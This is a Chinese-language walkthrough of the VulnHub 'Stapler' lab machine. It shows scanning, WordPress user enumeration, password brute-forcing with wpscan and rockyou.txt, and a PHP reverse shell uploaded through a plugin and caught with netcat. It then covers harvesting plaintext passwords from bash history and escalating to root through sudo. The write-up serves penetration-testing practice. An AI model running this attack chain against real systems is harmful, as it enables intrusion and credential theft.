# 靶场搭建

下载地址: https://download.vulnhub.com/stapler/Stapler.zip

ovf 文件直接导入 VM 会报错,因为它里面的数据结构进行过调整,需要按照 Unicode 字母顺序重新排列,以下是排列好的内容,需要覆盖掉原文件

<?xml version="1.0" encoding="UTF-8"?>
<!--Generated by VMware ovftool 4.1.0 (build-3018522), UTC time: 2016-06-07T10:02:55.518806Z-->
<Envelope vmw:buildId="build-3018522" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Stapler-disk1.vmdk" ovf:id="file1" ovf:size="757926912"/>
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="20" ovf:capacityAllocationUnits="byte * 2^30" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" ovf:populatedSize="2212560896"/>
  </DiskSection>
  <NetworkSection>
    <Info>The list of logical networks</Info>
    <Network ovf:name="hostonly">
      <Description>The hostonly network</Description>
    </Network>
  </NetworkSection>
  <VirtualSystem ovf:id="vm">
    <Info>A virtual machine</Info>
    <Name>Stapler</Name>
    <OperatingSystemSection ovf:id="93" vmw:osType="ubuntuGuest">
      <Info>The kind of installed guest operating system</Info>
    </OperatingSystemSection>
    <VirtualHardwareSection>
      <Info>Virtual hardware requirements</Info>
      <System>
        <vssd:Caption>Virtual Hardware Family</vssd:Caption>
        <vssd:InstanceID>0</vssd:InstanceID>
        <vssd:VirtualSystemIdentifier>Stapler</vssd:VirtualSystemIdentifier>
        <vssd:VirtualSystemType>vmx-15</vssd:VirtualSystemType>
      </System>
      <Item>
        <rasd:AllocationUnits>hertz * 10^6</rasd:AllocationUnits>
        <rasd:Caption>1 virtual CPU(s)</rasd:Caption>
        <rasd:Description>Number of Virtual CPUs</rasd:Description>
        <rasd:InstanceID>1</rasd:InstanceID>
        <rasd:ResourceType>3</rasd:ResourceType>
        <rasd:VirtualQuantity>1</rasd:VirtualQuantity>
      </Item>
      <Item>
        <rasd:AllocationUnits>byte * 2^20</rasd:AllocationUnits>
        <rasd:Caption>1024MB of memory</rasd:Caption>
        <rasd:Description>Memory Size</rasd:Description>
        <rasd:InstanceID>2</rasd:InstanceID>
        <rasd:ResourceType>4</rasd:ResourceType>
        <rasd:VirtualQuantity>1024</rasd:VirtualQuantity>
      </Item>
      <Item>
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>sataController0</rasd:Caption>
        <rasd:Description>SATA Controller</rasd:Description>
        <rasd:InstanceID>3</rasd:InstanceID>
        <rasd:ResourceSubType>AHCI</rasd:ResourceSubType>
        <rasd:ResourceType>20</rasd:ResourceType>
      </Item>
      <Item ovf:required="false">
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>usb</rasd:Caption>
        <rasd:Description>USB Controller (EHCI)</rasd:Description>
        <rasd:InstanceID>4</rasd:InstanceID>
        <rasd:ResourceSubType>vmware.usb.ehci</rasd:ResourceSubType>
        <rasd:ResourceType>23</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="ehciEnabled" vmw:value="true"/>
      </Item>
      <Item>
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>scsiController0</rasd:Caption>
        <rasd:Description>SCSI Controller</rasd:Description>
        <rasd:InstanceID>5</rasd:InstanceID>
        <rasd:ResourceSubType>lsilogic</rasd:ResourceSubType>
        <rasd:ResourceType>6</rasd:ResourceType>
      </Item>
      <Item>
        <rasd:AddressOnParent>2</rasd:AddressOnParent>
        <rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>
        <rasd:Caption>ethernet0</rasd:Caption>
        <rasd:Connection>hostonly</rasd:Connection>
        <rasd:Description>PCNet32 ethernet adapter on &quot;hostonly&quot;</rasd:Description>
        <rasd:InstanceID>6</rasd:InstanceID>
        <rasd:ResourceSubType>PCNet32</rasd:ResourceSubType>
        <rasd:ResourceType>10</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
        <vmw:Config ovf:required="false" vmw:key="wakeOnLanEnabled" vmw:value="false"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>video</rasd:Caption>
        <rasd:InstanceID>7</rasd:InstanceID>
        <rasd:ResourceType>24</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="enable3DSupport" vmw:value="false"/>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>vmci</rasd:Caption>
        <rasd:InstanceID>8</rasd:InstanceID>
        <rasd:ResourceSubType>vmware.vmci</rasd:ResourceSubType>
        <rasd:ResourceType>1</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item>
        <rasd:AddressOnParent>0</rasd:AddressOnParent>
        <rasd:Caption>disk0</rasd:Caption>
        <rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>
        <rasd:InstanceID>9</rasd:InstanceID>
        <rasd:Parent>3</rasd:Parent>
        <rasd:ResourceType>17</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AddressOnParent>1</rasd:AddressOnParent>
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>cdrom0</rasd:Caption>
        <rasd:InstanceID>10</rasd:InstanceID>
        <rasd:Parent>3</rasd:Parent>
        <rasd:ResourceType>15</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <vmw:Config ovf:required="false" vmw:key="cpuHotAddEnabled" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="memoryHotAddEnabled" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.powerOffType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.resetType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.suspendType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="tools.afterPowerOn" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.afterResume" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.beforeGuestShutdown" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.beforeGuestStandby" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.syncTimeWithHost" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.toolsUpgradePolicy" vmw:value="upgradeAtPowerCycle"/>
    </VirtualHardwareSection>
    <AnnotationSection ovf:required="false">
      <Info>A human-readable annotation</Info>
      <Annotation>--[[~~Enjoy. Have fun. Happy Hacking.~~]]--
+ There are multiple methods to-do this machine: At least
-- Two (2) paths to get a limited shell
-- At least three (3) ways to get a root access</Annotation>
    </AnnotationSection>
  </VirtualSystem>
</Envelope>

覆盖掉原文件后需要修改 mf 文件中记录的散列值: SHA1(Stapler.ovf)= 0737f41d2e522cda052c876ccb1fba6235dbacc5 这样就可以

通过虚拟机打开功能打开 ovf 文件就可以了

老规矩,添加一张网卡,设置 NAT 模式,IP 地址: 192.168.74.139

# 信息收集

# nmap

做一个快速地全端口扫描

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:30 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00032s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:24:85:D3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds

快速扫描没扫出来 12380 是什么东西,仔细扫扫看

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -sV -p 12380 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:36 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00038s latency).
PORT      STATE SERVICE VERSION
12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:24:85:D3 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds

发现原来也是个 web

扫描一下漏洞:

nmap 192.168.74.139 --script=vuln

发现存在 smb-vuln-cve2009-3103 ,但是 OS 不是 Windows。无

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.74.139        
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.74.139/_24-04-08_09-32-20.txt
Target: http://192.168.74.139/
[09:32:20] Starting: 
[09:32:21] 200 -  220B  - /.bash_logout                                     
[09:32:21] 200 -    4KB - /.bashrc                                          
[09:32:26] 200 -  675B  - /.profile                                         
                                                                             
Task Completed

三个 shell 配置文件,不知道这个靶场葫芦里卖的什么药

# nikto

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.139:12380
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.139
+ Target Hostname:    192.168.74.139
+ Target Port:        12380
+ Start Time:         2024-04-08 09:38:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /c/: This might be interesting.
+ /js: This might be interesting.
+ /CSNews.cgi?command=viewnews&database=none: csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.
+ /ci/: This might be interesting: potential country code (CÔte D'ivoire).
+ /is/: This might be interesting: potential country code (Iceland).
+ /ie/: This might be interesting: potential country code (Ireland).
+ /nu/: This might be interesting: potential country code (Niue).
+ /sb/: This might be interesting: potential country code (Solomon Islands).
+ /gs/: This might be interesting: potential country code (South Georgia And The South Sandwich Islands).
+ /wcadmin/login.aspx: QS/1 Webconnect administration panel.
+ 8115 requests: 14 error(s) and 14 item(s) reported on remote host
+ End Time:           2024-04-08 09:52:01 (GMT-4) (783 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

没有任何东西,奇了怪了,也看了看 web,就是啥也没发现

# 再次信息收集

怎么也收集不到关键信息,甚至找不到入口在哪里。所以再次信息收集,怀疑是 SSL 协议,所以重新收集一下信息

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u https://192.168.74.139:12380
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3                                                                            
 (_||| _) (/_(_|| (_| )                                                                                     
                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/https_192.168.74.139_12380/_24-04-08_10-05-28.txt
Target: https://192.168.74.139:12380/
[10:05:28] Starting:                                                                                        
[10:05:35] 403 -  303B  - /.ht_wsr.txt                                      
[10:05:35] 403 -  306B  - /.htaccess.bak1                                   
[10:05:35] 403 -  306B  - /.htaccess_orig                                   
[10:05:35] 403 -  304B  - /.htaccessBAK                                     
[10:05:35] 403 -  308B  - /.htaccess.sample
[10:05:35] 403 -  306B  - /.htaccess.orig
[10:05:35] 403 -  305B  - /.htaccessOLD2
[10:05:35] 403 -  296B  - /.htm
[10:05:35] 403 -  304B  - /.htaccess_sc                                     
[10:05:35] 403 -  307B  - /.htaccess_extra
[10:05:35] 403 -  306B  - /.htaccess.save
[10:05:35] 403 -  297B  - /.html                                            
[10:05:35] 403 -  302B  - /.htpasswds                                       
[10:05:35] 403 -  306B  - /.htpasswd_test                                   
[10:05:35] 403 -  304B  - /.htaccessOLD
[10:05:35] 403 -  303B  - /.httr-oauth
[10:05:37] 403 -  296B  - /.php                                             
[10:05:37] 403 -  297B  - /.php3                                            
[10:06:27] 301 -  331B  - /javascript  ->  https://192.168.74.139:12380/javascript/
[10:06:43] 301 -  331B  - /phpmyadmin  ->  https://192.168.74.139:12380/phpmyadmin/
[10:06:45] 200 -    3KB - /phpmyadmin/doc/html/index.html                   
[10:06:45] 200 -    3KB - /phpmyadmin/                                      
[10:06:45] 200 -    3KB - /phpmyadmin/index.php                             
[10:06:53] 200 -   59B  - /robots.txt                                       
[10:06:56] 403 -  305B  - /server-status                                    
[10:06:56] 403 -  306B  - /server-status/                                   
                                                                             
Task Completed

# nikto

┌──(root㉿kali)-[~]
└─# nikto -h https://192.168.74.139:12380/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.139
+ Target Hostname:    192.168.74.139
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
+ Start Time:         2024-04-08 10:05:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/admin112233/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /blogblog/: IP address found in the 'x-pingback' header. The IP is "192.168.164.128". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/blogblog/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.74.139' does not match certificate's names: Red.Initech. See: https://cwe.mitre.org/data/definitions/297.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8259 requests: 1 error(s) and 15 item(s) reported on remote host
+ End Time:           2024-04-08 10:13:34 (GMT-4) (471 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

这次就发现东西了

查看一下 blogblog 路径和 admin112233

发现是 wordpress 和一个 XSS 钓鱼的页面

那就懂了,这个靶场是要干碎 wordpress 和使用 Beef 钓鱼

# 汇总

  • admin112233 路径

  • blogblog 路径

  • phpmyadmin

  • wordpress4.2.1

  • Apache/2.4.18

  • Ubuntu

  • wpscan

  • BEEF XSS 钓鱼

  • SSH 爆破

  • FTP 爆破

  • phpmyadmin

# 漏洞利用

# wpscan

用 wpscan 扫一下先,直接扫描会报错 seems to be down (SSL peer certificate or SSH remote key was not OK)

所以我们扫描的时候禁用 tls 检查

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks

没有发现插件、主题等,那么攻击面就比较窄了,使用 api-token 看一下漏洞数量

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/--disable-tls-checks --api-token 我的 KEY

牛逼 118 个洞,有文件上柴暖、sql 注入。具体就能能不能用我有点懒得试

尝试枚举用户名

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks -e u
[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

发现了一些用户名,可以尝试进行撞库,但是撞库我认为是底牌,在此之前先尝试其他的用法

其实扫出来 118 个漏洞都可以尝试使用,但是真不想一个个试了,需要再次收集一下信息

# 爆破

通过之前的信息收集能找到 wp 的上传文件夹,但是上传文件夹中有上传的插件,通过插件的名字查到漏洞信息,可以通过具体的漏洞信息进行 getshell。但是很麻烦所以直接爆破 wp 账号的口令算了

解压常用的字典文件: gzip -d /usr/share/wordlists/rockyou.txt.gz

然后进行爆破

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url https://192.168.74.139:12380/blogblog -P /usr/share/wordlists/rockyou.txt -U john --disable-tls-checks --max-threads 100 --password-attack wp-login

爆破了 18 万次,这也是为什么不推荐的原因,实在是太久了。得到了账号密码: john/incorrect

登录进去之后发现是管理员权限

那就直接通过插件上传马子,或者直接修改模板写入一句话

通过插件上传 kali 自带的 shell.php

nc 监听拿到了反弹 shell

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.139] 57954
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
 14:49:29 up  2:17,  0 users,  load average: 84.46, 78.24, 48.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

查看一下所有用户的历史记录 cat /home/*/.bash_history

看到了两个账号密码

sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost

还有一条记录表明 peter 账号我们没有权限查看他的历史记录,所以估计是个高权限账号,我们就登录到这个账号里面去

进去之后查看 sudo 权限,直接切换 root 账号就可以

www-data@red:/home$ ssh peter@localhost
ssh peter@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
peter@localhost's password: JZQuyIN5
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q)  Quit and do nothing.  The function will be run again next time.
(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.
(1)  Continue to the main menu.
(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).
--- Type one of the keys in parentheses --- 2
2^J
prompt_adam1_setup:1: scalar parameter prompt_adam1_color1 created globally in function
prompt_adam1_setup:2: scalar parameter prompt_adam1_color2 created globally in function
prompt_adam1_setup:3: scalar parameter prompt_adam1_color3 created globally in function
prompt_adam1_setup:5: scalar parameter base_prompt created globally in function
prompt_adam1_setup:6: scalar parameter post_prompt created globally in function
prompt_adam1_setup:9: scalar parameter base_prompt_no_color created globally in function
prompt_adam1_setup:10: scalar parameter post_prompt_no_color created globally in function
/home/peter/.zshrc:15: scalar parameter HISTFILE created globally in function
(eval):1: scalar parameter LS_COLORS created globally in function
peter@red ~ %                                                                  
peter@red ~ % sudo -l                                                          
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for peter: JZQuyIN5
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
    (ALL : ALL) ALL
peter@red ~ % sudo su root                                                     
sudo su root
➜  peter id                                                                    
id
uid=0(root) gid=0(root) groups=0(root)

最终拿到了 root 权限

这个配置是关于用户 peter 在主机 red 上的 sudo 权限配置。让我们来逐条解释这些配置项:

  1. Defaults entries for peter on red:

    • lecture=always : 这个选项指定了当用户 peter 使用 sudo 时,系统应该始终显示授权信息和警告信息。
    • env_reset : 这个选项指定了在运行 sudo 命令时,环境变量应该被重置为安全的默认值,以避免潜在的安全问题。
    • mail_badpass : 这个选项指定了如果用户输入了错误的密码尝试使用 sudo,系统应该通过邮件通知管理员。
    • secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin : 这个选项指定了在使用 sudo 时,用户 peter 能够访问的命令路径。这里列出的路径是安全的系统默认路径,用户可以在这些路径中执行命令。
  2. User peter may run the following commands on red:

    • (ALL : ALL) ALL : 这个条目指定了用户 peter 在主机 red 上拥有完全的 sudo 权限。具体来说,它表示 peter 可以以任何用户身份(ALL)、在任何终端(ALL)、运行任何命令(ALL)。

总结起来,这个配置允许用户 peter 在主机 red 上使用 sudo 以任何用户身份运行任何命令,系统会始终显示授权信息和警告信息,环境变量会被重置为安全默认值,而且如果密码输入错误会通过邮件通知管理员。这样的配置是非常强大的,因此应该谨慎使用,确保只有经过授权的用户才能拥有这样的权限。

# 小结

思路很混乱,信息收集不是一个一次性的过程,而是多次循环的,太局限与初始的信息收集了,之后不再进行汇总式信息收集,而是随着深入进行收集,将汇总的信息单独放在最后

同时太懒,不愿意去看别人写的代码,并且不愿意去做尝试,这源于我对工具本省不熟练,没有组成属于自己习惯的攻击方式。导致遇到新的点就需要不停地切换不同的工具,进而产生怠惰

但是这种都需要一点点磨炼,一定要多动手才可以越来越轻松。

共勉,加油!